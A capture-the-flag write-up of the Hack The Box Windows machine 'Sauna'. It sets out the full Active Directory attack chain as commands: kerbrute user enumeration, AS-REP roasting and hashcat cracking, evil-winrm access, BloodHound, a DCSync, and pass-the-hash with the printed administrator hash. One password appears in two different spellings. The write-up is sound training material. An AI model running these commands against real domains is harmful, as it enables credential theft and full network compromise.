SaunaFebruary 03, 2025 Created by Page Difficulty OS egotisticalSW Hack The Box Easy Windows The first step is to perform a scan of the open ports and then list the versions and technologies used on the open ports. nmap -p- --open --min-rate 3000 -vvv -sS -Pn 10.10.10.175 -oG scan /opt/extractports scan nmap -p53,80,88,135,139,389,445,464,593,636,3268,3269,5985,9389,49667,49673,49674,49677,49695 -Pn -sCV 10.10.10.175 -oN ports I found the domain EGOTISTICAL-BANL.LOCAL, I added it to the file in the hosts file When I see port 53 open, I gather different information and find a subdomain. dig @10.10.10.175 EGOTISTICAL-BANK.LOCAL any Looking at the different pages I find one with names and surnames of potential users. Using the names and surnames found I create a dictionary of users that I will validate with kerbrute to find those that exist in the system. ./username-anarchy -i ../users > usuarios /opt/kerbrute userenum --dc 10.10.10.175 -d EGOTISTICAL-BANK.LOCAL /home/rufo/usuarios I check if I can make a we ASREPRoast Attack with the found user. I get his TGT and manage to get his password in clear text. impacket-GetNPUsers EGOTISTICAL-BANK.LOCAL/ -no-pass -usersfile users hashcat -m 18200 TGT_fsmith /usr/share/wordlists/rockyou.txt I verify the credentials and get access to the system through winrm to read the first flag. netexec winrm 10.10.10.175 -u fsmith -p Thestrokes23 evil-winrm -i 10.10.10.175 -u fsmith -p Thestrokes23 At this point I run winpeas to get a broader view of the system I am dealing with. I notice in the output that there are some autologon credentials. I check if the password found belongs to a user and confirm that they belong to svc_loanmgr. netexec smb 10.10.10.175 -u svc_loanmgr -p Monkeymakestheworldground! At this point I collect information from the system in order to use bloodhound and look for possible routes to escalate my privileges. neo4j console bloodhound &>/dev/null & netexec ldap 10.10.10.175 -u fsmith -p Thestrokes23 --bloodhound --collection All --dns-server 10.10.10.175 Thanks to bloodhound I see that I have enough permissions with svc_loanmgr to perform a DCSync attack and get the NTLM hash of the administrator user. With this I can do PtH, access the system and read the second flag. netexec smb 10.10.10.175 -u svc_loanmgr -p Moneymakestheworldgoround! --ntds --user Administrator evil-winrm -i 10.10.10.175 -u Administrator -H 823452073d75b9d1cf70ebdf86c7f98e